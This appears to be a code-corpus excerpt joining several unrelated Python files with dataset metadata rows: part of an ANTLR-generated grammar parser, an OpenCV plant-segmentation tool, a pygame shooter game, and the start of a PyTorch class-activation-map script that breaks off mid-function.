_la = self._input.LA(1)
if _la==ANTLRv4Parser.OPTIONS:
self.state = 572
self.optionsSpec()
self.state = 578
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.AT:
self.state = 575
self.ruleAction()
self.state = 580
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 581
self.match(ANTLRv4Parser.COLON)
self.state = 584
self.altList()
self.state = 585
self.match(ANTLRv4Parser.RPAREN)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class RulerefContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self.value = None # Token
def RULE_REF(self):
return self.getToken(ANTLRv4Parser.RULE_REF, 0)
def argActionBlock(self):
return self.getTypedRuleContext(ANTLRv4Parser.ArgActionBlockContext,0)
def elementOptions(self):
return self.getTypedRuleContext(ANTLRv4Parser.ElementOptionsContext,0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_ruleref
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRuleref" ):
listener.enterRuleref(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRuleref" ):
listener.exitRuleref(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitRuleref" ):
return visitor.visitRuleref(self)
else:
return visitor.visitChildren(self)
def ruleref(self):
localctx = ANTLRv4Parser.RulerefContext(self, self._ctx, self.state)
self.enterRule(localctx, 110, self.RULE_ruleref)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 587
localctx.value = self.match(ANTLRv4Parser.RULE_REF)
self.state = 589
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.BEGIN_ARGUMENT:
self.state = 588
self.argActionBlock()
self.state = 592
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.LT:
self.state = 591
self.elementOptions()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class CharacterRangeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self.start = None # Token
self.end = None # Token
def RANGE(self):
return self.getToken(ANTLRv4Parser.RANGE, 0)
def STRING_LITERAL(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.STRING_LITERAL)
else:
return self.getToken(ANTLRv4Parser.STRING_LITERAL, i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_characterRange
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCharacterRange" ):
listener.enterCharacterRange(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCharacterRange" ):
listener.exitCharacterRange(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitCharacterRange" ):
return visitor.visitCharacterRange(self)
else:
return visitor.visitChildren(self)
def characterRange(self):
localctx = ANTLRv4Parser.CharacterRangeContext(self, self._ctx, self.state)
self.enterRule(localctx, 112, self.RULE_characterRange)
try:
self.enterOuterAlt(localctx, 1)
self.state = 594
localctx.start = self.match(ANTLRv4Parser.STRING_LITERAL)
self.state = 595
self.match(ANTLRv4Parser.RANGE)
self.state = 596
localctx.end = self.match(ANTLRv4Parser.STRING_LITERAL)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class TerminalContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return ANTLRv4Parser.RULE_terminal
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class TerminalRefContext(TerminalContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.TerminalContext
super().__init__(parser)
self.value = None # Token
self.copyFrom(ctx)
def TOKEN_REF(self):
return self.getToken(ANTLRv4Parser.TOKEN_REF, 0)
def elementOptions(self):
return self.getTypedRuleContext(ANTLRv4Parser.ElementOptionsContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTerminalRef" ):
listener.enterTerminalRef(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTerminalRef" ):
listener.exitTerminalRef(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitTerminalRef" ):
return visitor.visitTerminalRef(self)
else:
return visitor.visitChildren(self)
class TerminalLitContext(TerminalContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.TerminalContext
super().__init__(parser)
self.value = None # Token
self.copyFrom(ctx)
def STRING_LITERAL(self):
return self.getToken(ANTLRv4Parser.STRING_LITERAL, 0)
def elementOptions(self):
return self.getTypedRuleContext(ANTLRv4Parser.ElementOptionsContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTerminalLit" ):
listener.enterTerminalLit(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTerminalLit" ):
listener.exitTerminalLit(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitTerminalLit" ):
return visitor.visitTerminalLit(self)
else:
return visitor.visitChildren(self)
def terminal(self):
localctx = ANTLRv4Parser.TerminalContext(self, self._ctx, self.state)
self.enterRule(localctx, 114, self.RULE_terminal)
self._la = 0 # Token type
try:
self.state = 606
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [ANTLRv4Parser.TOKEN_REF]:
localctx = ANTLRv4Parser.TerminalRefContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 598
localctx.value = self.match(ANTLRv4Parser.TOKEN_REF)
self.state = 600
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.LT:
self.state = 599
self.elementOptions()
pass
elif token in [ANTLRv4Parser.STRING_LITERAL]:
localctx = ANTLRv4Parser.TerminalLitContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 602
localctx.value = self.match(ANTLRv4Parser.STRING_LITERAL)
self.state = 604
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.LT:
self.state = 603
self.elementOptions()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ElementOptionsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def LT(self):
return self.getToken(ANTLRv4Parser.LT, 0)
def elementOption(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.ElementOptionContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.ElementOptionContext,i)
def GT(self):
return self.getToken(ANTLRv4Parser.GT, 0)
def COMMA(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.COMMA)
else:
return self.getToken(ANTLRv4Parser.COMMA, i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_elementOptions
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterElementOptions" ):
listener.enterElementOptions(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitElementOptions" ):
listener.exitElementOptions(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitElementOptions" ):
return visitor.visitElementOptions(self)
else:
return visitor.visitChildren(self)
def elementOptions(self):
localctx = ANTLRv4Parser.ElementOptionsContext(self, self._ctx, self.state)
self.enterRule(localctx, 116, self.RULE_elementOptions)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 608
self.match(ANTLRv4Parser.LT)
self.state = 609
self.elementOption()
self.state = 614
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.COMMA:
self.state = 610
self.match(ANTLRv4Parser.COMMA)
self.state = 611
self.elementOption()
self.state = 616
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 617
self.match(ANTLRv4Parser.GT)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ElementOptionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def identifier(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.IdentifierContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,i)
def ASSIGN(self):
return self.getToken(ANTLRv4Parser.ASSIGN, 0)
def STRING_LITERAL(self):
return self.getToken(ANTLRv4Parser.STRING_LITERAL, 0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_elementOption
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterElementOption" ):
listener.enterElementOption(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitElementOption" ):
listener.exitElementOption(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitElementOption" ):
return visitor.visitElementOption(self)
else:
return visitor.visitChildren(self)
def elementOption(self):
localctx = ANTLRv4Parser.ElementOptionContext(self, self._ctx, self.state)
self.enterRule(localctx, 118, self.RULE_elementOption)
try:
self.state = 626
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,84,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 619
self.identifier()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 620
self.identifier()
self.state = 621
self.match(ANTLRv4Parser.ASSIGN)
self.state = 624
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [ANTLRv4Parser.TOKEN_REF, ANTLRv4Parser.RULE_REF]:
self.state = 622
self.identifier()
pass
elif token in [ANTLRv4Parser.STRING_LITERAL]:
self.state = 623
self.match(ANTLRv4Parser.STRING_LITERAL)
pass
else:
raise NoViableAltException(self)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class IdentifierContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return ANTLRv4Parser.RULE_identifier
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class RuleRefIdentifierContext(IdentifierContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.IdentifierContext
super().__init__(parser)
self.value = None # Token
self.copyFrom(ctx)
def RULE_REF(self):
return self.getToken(ANTLRv4Parser.RULE_REF, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRuleRefIdentifier" ):
listener.enterRuleRefIdentifier(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRuleRefIdentifier" ):
listener.exitRuleRefIdentifier(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitRuleRefIdentifier" ):
return visitor.visitRuleRefIdentifier(self)
else:
return visitor.visitChildren(self)
class TokenRefIdentifierContext(IdentifierContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.IdentifierContext
super().__init__(parser)
self.value = None # Token
self.copyFrom(ctx)
def TOKEN_REF(self):
return self.getToken(ANTLRv4Parser.TOKEN_REF, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTokenRefIdentifier" ):
listener.enterTokenRefIdentifier(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTokenRefIdentifier" ):
listener.exitTokenRefIdentifier(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitTokenRefIdentifier" ):
return visitor.visitTokenRefIdentifier(self)
else:
return visitor.visitChildren(self)
def identifier(self):
localctx = ANTLRv4Parser.IdentifierContext(self, self._ctx, self.state)
self.enterRule(localctx, 120, self.RULE_identifier)
try:
self.state = 630
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [ANTLRv4Parser.RULE_REF]:
localctx = ANTLRv4Parser.RuleRefIdentifierContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 628
localctx.value = self.match(ANTLRv4Parser.RULE_REF)
pass
elif token in [ANTLRv4Parser.TOKEN_REF]:
localctx = ANTLRv4Parser.TokenRefIdentifierContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 629
localctx.value = self.match(ANTLRv4Parser.TOKEN_REF)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
| 36.777166 | 368 | 0.593405 | 189,908 | 0.887852 | 0 | 0 | 0 | 0 | 0 | 0 | 27,044 | 0.126435 |
e2e488741305886db9ebd01a54b31478a708d79b | 14,876 | py | Python | PlantDetector.py | julzerinos/python-opencv-plant_detection | f7895d42cdf6c8d8a7fa43dd624024f185542207 | [
"MIT"
] | 10 | 2020-08-29T08:30:24.000Z | 2022-02-15T14:06:19.000Z | PlantDetector.py | julzerinos/python-opencv-plant_detection | f7895d42cdf6c8d8a7fa43dd624024f185542207 | [
"MIT"
] | null | null | null | PlantDetector.py | julzerinos/python-opencv-plant_detection | f7895d42cdf6c8d8a7fa43dd624024f185542207 | [
"MIT"
] | 3 | 2020-08-29T08:30:31.000Z | 2021-01-09T07:52:45.000Z | import cv2 as cv # opencv
import copy # for deepcopy on images
import numpy as np # numpy
from random import randint # for random values
import threading # for deamon processing
from pathlib import Path # for directory information
import os # for directory information
from constants import constants # constants
class PlantDetector:
"""Dynamically apply detection algorithms to source images
All images are sourced from and follow naming standard from
the KOMATSUNA dataset
http://limu.ait.kyushu-u.ac.jp/~agri/komatsuna/
METHODS
__init__(self, src='multi_plant', labels='multi_label') [void]
prepares the images and labels for display
initializes windows and trackbars
runs background subtraction on plant group images
on_low_H_thresh_trackbar(self, val)
on_high_H_thresh_trackbar(self, val)
on_low_S_thresh_trackbar(self, val)
on_high_S_thresh_trackbar(self, val)
on_low_V_thresh_trackbar(self, val)
on_high_V_thresh_trackbar(self, val)
HSV trackbar triggers
prepare_plant_collection(self, src, labelsrc)
returns [plants, plant_groups, labels]
constructor helper function for loading plant images
parse(self, auto_inc=False, mode=0) [void]
main function
dynamically applies
HSV inRange filters
watershed algorithm
to the currently displayed image
based on selected HSV trackbar values
six modes are displayable:
mode: window1 + window2
0 : original (fallback) + original
1 : HSV filter range + original
2 : bare watershed masks + labels
3 : watershed masks w/ bg + original
4 : sequential bg sub + original
5 : seq bg sub w/ watersh + original
additionally, the user is allowed control
key | function
m | next image
n | prev image
s | save selected image in the selected mode
z | save all images in selected mode
esc | exit the program
d | dynamically calculate dice
f | show dice data based on saved images
1-5 | select the respective mode
parse is also used for saving all images
parse is run for all images in the given mode
either in parrallel or in place
save_one(self, mode, image, filename) [void]
saves the image in the appropriate mode folder with filename
HSV_filtering_and_watershed(self, input_im) [mask, input_im, im_threshold]
image is filtered through HSV inRange according to trackbar values
image is prepared (threshold) for watershed algorithm
watershed algorithm is applied
markers are applied to image
dicify_wrapper(self, image_id) [void]
runs dice summary in background
dicify_summary(self, image_id) [void]
prints summary of dice values for image, plant, dateset
note: based on saved images
dicify_one(self, image_id) [dice]
returns the dice value for the given image_id
based on saved segmentation and label images
dicify_one_dynamic(self, mask, image_id) [dice]
returns dice value for the given image_id
based on given mask (current) and saved label image
dicify_plant(self, plant_id) [mean, min, max]
returns mean, min and max dice values for images in plant group
dicify_all(self) [mean, min, max]
returns mean, min and max dice values for images in dataset
and for each plant
"""
def __init__(self, src='multi_plant', labels='multi_label'):
self.c = constants()
self.window1 = self.c.window.window1
self.window2 = self.c.window.window2
cv.namedWindow(self.window1)
cv.namedWindow(self.window2)
cv.moveWindow(self.window2, 550, 90)
cv.createTrackbar(
self.c.HSV.low_H_name, self.window1, self.c.HSV.low_H,
self.c.HSV.max_value_H, self.on_low_H_thresh_trackbar)
cv.createTrackbar(
self.c.HSV.high_H_name, self.window1, self.c.HSV.high_H,
self.c.HSV.max_value_H, self.on_high_H_thresh_trackbar)
cv.createTrackbar(
self.c.HSV.low_S_name, self.window1, self.c.HSV.low_S,
self.c.HSV.max_value, self.on_low_S_thresh_trackbar)
cv.createTrackbar(
self.c.HSV.high_S_name, self.window1, self.c.HSV.high_S,
self.c.HSV.max_value, self.on_high_S_thresh_trackbar)
cv.createTrackbar(
self.c.HSV.low_V_name, self.window1, self.c.HSV.low_V,
self.c.HSV.max_value, self.on_low_V_thresh_trackbar)
cv.createTrackbar(
self.c.HSV.high_V_name, self.window1, self.c.HSV.high_V,
self.c.HSV.max_value, self.on_high_V_thresh_trackbar)
self.plants, self.plant_groups, self.labels = self.prepare_plant_collection(src, labels)
# source https://docs.opencv.org/3.4/d1/dc5/tutorial_background_subtraction.html
for key in self.plant_groups:
if self.c.bgsub.mod == 'MOG2':
backSub = cv.createBackgroundSubtractorMOG2(history=60, detectShadows=True)
elif self.c.bgsub.mod == 'KNN':
backSub = cv.createBackgroundSubtractorKNN()
fgMask = None
for i, image in enumerate(self.plant_groups[key]):
fgMask = backSub.apply(image)
self.plant_groups[key][i] = fgMask
def on_low_H_thresh_trackbar(self, val):
self.c.HSV.low_H = val
self.c.HSV.low_H = min(self.c.HSV.high_H-1, self.c.HSV.low_H)
cv.setTrackbarPos(
self.c.HSV.low_H_name, self.window1, self.c.HSV.low_H)
def on_high_H_thresh_trackbar(self, val):
self.c.HSV.high_H = val
self.c.HSV.high_H = max(self.c.HSV.high_H, self.c.HSV.low_H+1)
cv.setTrackbarPos(
self.c.HSV.high_H_name, self.window1, self.c.HSV.high_H)
def on_low_S_thresh_trackbar(self, val):
self.c.HSV.low_S = val
self.c.HSV.low_S = min(self.c.HSV.high_S-1, self.c.HSV.low_S)
cv.setTrackbarPos(
self.c.HSV.low_S_name, self.window1, self.c.HSV.low_S)
def on_high_S_thresh_trackbar(self, val):
self.c.HSV.high_S = val
self.c.HSV.high_S = max(self.c.HSV.high_S, self.c.HSV.low_S+1)
cv.setTrackbarPos(
self.c.HSV.high_S_name, self.window1, self.c.HSV.high_S)
def on_low_V_thresh_trackbar(self, val):
self.c.HSV.low_V = val
self.c.HSV.low_V = min(self.c.HSV.high_V-1, self.c.HSV.low_V)
cv.setTrackbarPos(
self.c.HSV.low_V_name, self.window1, self.c.HSV.low_V)
def on_high_V_thresh_trackbar(self, val):
self.c.HSV.high_V = val
self.c.HSV.high_V = max(self.c.HSV.high_V, self.c.HSV.low_V+1)
cv.setTrackbarPos(
self.c.HSV.high_V_name, self.window1, self.c.HSV.high_V)
def prepare_plant_collection(self, src, labelsrc):
plants = []
plant_groups = dict()
files = os.listdir(src)
files.sort()
for fl in files:
input_im = cv.imread(src + '/' + fl, cv.IMREAD_COLOR)
if (input_im is None):
exit()
plants.append({
'p': input_im,
'n': fl
})
group_id = f'{fl.split("_")[1]}{fl.split("_")[2]}'
if group_id not in plant_groups:
plant_groups[group_id] = []
plant_groups[group_id].append(input_im)
labels = []
files = os.listdir(labelsrc)
files.sort()
for fl in files:
input_im = cv.imread(labelsrc + '/' + fl)
if (input_im is None):
exit()
labels.append(input_im)
return plants, plant_groups, labels
def parse(self, auto_inc=False, mode=0):
key = 0
i = 0
l_tog = False
while key != self.c.cntr.exit_k:
if auto_inc and i == len(self.plants):
break
image = copy.deepcopy(self.plants[i]['p'])
group_id = f'{self.plants[i]["n"].split("_")[1]}{self.plants[i]["n"].split("_")[2]}'
mask, markers, im_threshold = self.HSV_filtering_and_watershed(image)
_, bgfgSegMarkers, _ = self.HSV_filtering_and_watershed(
cv.cvtColor(self.plant_groups[group_id][i % 60], cv.COLOR_GRAY2BGR)
)
if mode == 5:
alt = bgfgSegMarkers
text = f'Watershed new areas w/ fg/bg segm. {self.plants[i]["n"]}'
tcol = (255, 255, 255)
elif mode == 4:
alt = copy.deepcopy(self.plant_groups[group_id][i % 60])
text = f'FG/BG segmentation {self.plants[i]["n"]}'
tcol = (255, 255, 255)
elif mode == 3:
alt = markers
text = f'Watershed algorithm areas w/ bg {self.plants[i]["n"]}'
tcol = (0, 0, 0)
elif mode == 2:
alt = mask
text = f'Watershed algorithm areas bare {self.plants[i]["n"]}'
tcol = (255, 255, 255)
elif mode == 1:
alt = im_threshold
text = f'HSV inRange threshold {self.plants[i]["n"]}'
tcol = (255, 255, 255)
else:
alt = copy.deepcopy(self.plants[i]['p'])
text = f'Original {self.plants[i]["n"]}'
tcol = (0, 0, 0)
if self.c.asth.text:
cv.putText(alt, text, (0, 20), self.c.asth.font, .5, tcol, 1)
cv.imshow(self.window1, alt)
if l_tog:
cv.imshow(self.window2, self.labels[i])
else:
cv.imshow(self.window2, self.plants[i]['p'])
key = cv.waitKey(10)
if key == self.c.cntr.prev_k and i > 0:
i -= 1
if key == self.c.cntr.next_k and i < len(self.plants) - 1:
i += 1
if key == self.c.cntr.save or auto_inc:
self.save_one(mode, alt, self.plants[i]["n"])
if key == self.c.cntr.save_all:
self.parse(True, mode)
if key == self.c.cntr.dice:
print(self.dicify_one_dynamic(mask, self.plants[i]['n']))
if key == self.c.cntr.dice_more:
self.dicify_wrapper(self.plants[i]['n'])
if key == self.c.cntr.m1_k:
mode = 1
l_tog = False
elif key == self.c.cntr.m2_k:
mode = 2
l_tog = True
elif key == self.c.cntr.m3_k:
mode = 3
l_tog = False
elif key == self.c.cntr.m4_k:
mode = 4
l_tog = False
elif key == self.c.cntr.m5_k:
mode = 5
l_tog = False
if auto_inc:
i += 1
def save_one(self, mode, image, filename):
Path(f'formatted/{self.c.cntr.modes[mode]}').mkdir(parents=True, exist_ok=True)
cv.imwrite(f'formatted/{self.c.cntr.modes[mode]}/{filename}', image)
def HSV_filtering_and_watershed(self, input_im):
im_threshold = cv.inRange(
cv.cvtColor(input_im, cv.COLOR_BGR2HSV),
(self.c.HSV.low_H, self.c.HSV.low_S, self.c.HSV.low_V),
(self.c.HSV.high_H, self.c.HSV.high_S, self.c.HSV.high_V)
)
# source https://docs.opencv.org/master/d3/db4/tutorial_py_watershed.html
kernel = np.ones((3, 3), np.uint8)
opening = cv.morphologyEx(im_threshold, cv.MORPH_OPEN, kernel, iterations=5)
sure_bg = cv.dilate(opening, kernel, iterations=7)
dist_transform = cv.distanceTransform(opening, cv.DIST_L2, 5)
_, sure_fg = cv.threshold(dist_transform, 0.3*dist_transform.max(), 255, 0)
sure_fg = np.uint8(sure_fg)
unknown = cv.subtract(sure_bg, sure_fg)
_, markers = cv.connectedComponents(sure_fg)
markers = markers + 1
markers[unknown == 255] = 0
markers = cv.watershed(input_im, markers)
input_im[markers == -1] = [255, 0, 0]
for i in range(2, markers.max() + 1):
input_im[markers == i] = [
randint(0, 255), randint(0, 255), randint(0, 255)
] if self.c.xtra.disco else [
(40 + i * 40) % 255, (i * 40) % 255, (50 + i * 40) % 255
]
mask = copy.deepcopy(input_im)
mask[markers < 2] = [0, 0, 0]
return mask, input_im, im_threshold
def dicify_wrapper(self, image_id):
thread = threading.Thread(target=self.dicify_summary, args=(image_id,), daemon=True)
thread.start()
def dicify_summary(self, image_id):
print(self.dicify_all())
def dicify_one(self, image_id):
# Source: https://github.com/Kornelos/CV_MINI_1/blob/master/process_plants.py
img = cv.imread(f'multi_label/label_{image_id.split("_", 1)[1]}')
img = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
_, gt = cv.threshold(img, 1, 255, cv.THRESH_BINARY)
img = cv.imread(f'formatted/ws_mask/{image_id}')
img = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
_, rt = cv.threshold(img, 1, 255, cv.THRESH_BINARY)
k = 255
dice = np.sum(rt[gt == k]) * 2.0 / (np.sum(rt[rt == k]) + np.sum(gt[gt == k]))
return dice
def dicify_one_dynamic(self, mask, image_id):
img = cv.imread(f'multi_label/label_{image_id.split("_", 1)[1]}')
img = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
_, gt = cv.threshold(img, 1, 255, cv.THRESH_BINARY)
img = cv.cvtColor(mask, cv.COLOR_BGR2GRAY)
_, rt = cv.threshold(img, 1, 255, cv.THRESH_BINARY)
k = 255
dice = np.sum(rt[gt == k]) * 2.0 / (np.sum(rt[rt == k]) + np.sum(gt[gt == k]))
return dice
def dicify_plant(self, plant_id):
vals = []
for im_data in [
t for t in self.plants
if t['n'].split('_')[2] == plant_id
]:
vals.append(self.dicify_one(im_data['n']))
return [np.mean(vals), min(vals), max(vals)]
def dicify_all(self):
means = []
mins = []
maxs = []
summ = "id | mean | min | max"
for i in range(0, 5):
plant = self.dicify_plant(f'0{str(i)}')
means.append(plant[0])
mins.append(plant[1])
maxs.append(plant[2])
summ += f'\n0{str(i)} | {round(plant[0], 3)} | {round(plant[1], 3)} | {round(plant[2], 3)}'
summ += f'\nsm | {round(np.mean(means), 3)} | {round(min(mins), 3)} | {round(max(maxs), 3)}'
return summ
# Main
plDt = PlantDetector()
plDt.parse()
| 36.106796 | 103 | 0.576768 | 14,503 | 0.974926 | 0 | 0 | 0 | 0 | 0 | 0 | 4,505 | 0.302837 |
e2e4c9ad3d9448aaf89ca9204aebc30bfaa811af | 3,061 | py | Python | shooter_game.py | TaseeTee/shooter_game | f21e128ee12b58ac230d14868b790178d11bf7c6 | [
"CC0-1.0"
] | null | null | null | shooter_game.py | TaseeTee/shooter_game | f21e128ee12b58ac230d14868b790178d11bf7c6 | [
"CC0-1.0"
] | null | null | null | shooter_game.py | TaseeTee/shooter_game | f21e128ee12b58ac230d14868b790178d11bf7c6 | [
"CC0-1.0"
] | null | null | null | from pygame import *
from random import randint
window = display.set_mode((700, 500))
display.set_caption('Шутер')
lost = 0
c = 0
class GameSprite(sprite.Sprite):
def __init__(self, player_image, player_x, player_y, player_w, player_h, player_speed):
super().__init__()
self.image = transform.scale(image.load(player_image), (player_w, player_h))
self.speed = player_speed
self.rect = self.image.get_rect()
self.rect.x = player_x
self.rect.y = player_y
def reset(self):
window.blit(self.image, (self.rect.x, self.rect.y))
class PlayerSprite(GameSprite):
def update(self):
keys = key.get_pressed()
if keys[K_d] and self.rect.x < 625:
self.rect.x += 10
if keys[K_a] and self.rect.x > 5:
self.rect.x += - 10
def fire(self):
bullet = Bullet('bullet.png', self.rect.centerx, self.rect.top, 15, 20, -15)
bullets.add(bullet)
mfire.play()
class ЕnemySprite(GameSprite):
def update(self):
self.rect.y += 2
global lost
if self.rect.y > 500:
self.rect.x = randint(80, 420)
self.rect.y = 0
lost += 1
class Bullet(GameSprite):
def update(self):
if self.rect.y > 0:
self.rect.y -= 15
if self.rect.y < 0:
self.kill()
background = transform.scale(image.load('galaxy.jpg'),(700,500))
clock = time.Clock()
FPS = 60
mixer.init()
mixer.music.load('space.ogg')
mixer.music.play()
mfire = mixer.Sound('fire.ogg')
font.init()
font1 = font.SysFont('Arial', 18)
font2 = font.SysFont('Arial', 75)
mc = PlayerSprite('rocket.png', 350, 425, 65, 65, 10)
enemies = sprite.Group()
for enemy in range(5):
enemy = ЕnemySprite('ufo.png', randint(0,625), 0, 65, 65, 5)
enemies.add(enemy)
bullets = sprite.Group()
game = True
while game:
window.blit(background,(0,0))
bullets.draw(window)
bullets.update()
mc.reset()
enemies.draw(window)
mc.update()
enemies.update()
for e in event.get():
if e.type == QUIT:
game = False
if e.type == KEYDOWN:
if e.key == K_SPACE:
mc.fire()
sprites_list1 = sprite.groupcollide(enemies, bullets, True, True)
sprites_list2 = sprite.spritecollide(mc, enemies, False)
text_lose = font1.render("Пропущено: " + str(lost), 1, (255,255,255))
text_win = font1.render("Сбито: " + str(c), 1, (255,255,255))
for enemy in range(len(sprites_list1)):
enemy = ЕnemySprite('ufo.png', randint(0,625), 0, 65, 65, 5)
enemies.add(enemy)
c += 1
if c == 3:
win = font2.render("Победа!", 1, (255,255,255))
window.blit(win, (150, 250))
game = False
if lost >= 3 or len(sprites_list2) >= 1:
lose = font2.render("Поражение" , 1, (255,255,255))
window.blit(lose, (80, 250))
game = False
window.blit(text_lose, (500, 40))
window.blit(text_win, (500, 80))
display.update()
clock.tick(FPS)
| 27.827273 | 91 | 0.587716 | 1,233 | 0.397999 | 0 | 0 | 0 | 0 | 0 | 0 | 172 | 0.05552 |
e2e63f122a8263e057c7c5f1b88e244fdf783447 | 5,948 | py | Python | test_action40.py | gmayday1997/pytorch_CAM | c51a0c7f7701005b8f031ed9a0f9b3b9680cf560 | [
"MIT"
] | 23 | 2018-02-13T00:50:11.000Z | 2021-02-04T01:49:34.000Z | test_action40.py | gmayday1997/pytorch-CAM | c51a0c7f7701005b8f031ed9a0f9b3b9680cf560 | [
"MIT"
] | null | null | null | test_action40.py | gmayday1997/pytorch-CAM | c51a0c7f7701005b8f031ed9a0f9b3b9680cf560 | [
"MIT"
] | 5 | 2017-12-19T10:48:22.000Z | 2021-02-04T01:49:35.000Z | import os
import numpy as np
import torch
import torch.nn as nn
import torchvision
import torch.utils.data as Data
import torchvision.transforms as transforms
import torchvision.datasets as datasets
from torch.autograd import Variable
from torch.nn import functional as F
from action40_config import config
import vgg16_model as models
import utils as utils
import fold as imgfolder
import transforms as trans
import shutil
import cv2
import json
import matplotlib.pyplot as plt
import collections
configs = config()
resume = 1
def parse_json(file_path):
import json
json_file = file(file_path)
j = json.load(json_file)
return j
######## source code from offical code ###############
def returnCAM(feature_conv, weight_softmax, class_idx,probs):
# generate the class activation maps upsample to 256x256
top_number = len(class_idx)
size_upsample = (256, 256)
bz, nc, h, w = feature_conv.shape
output_cam = {}
output_cam_imgs = []
output_cam_prob = {}
#out = collections.OrderedDict()
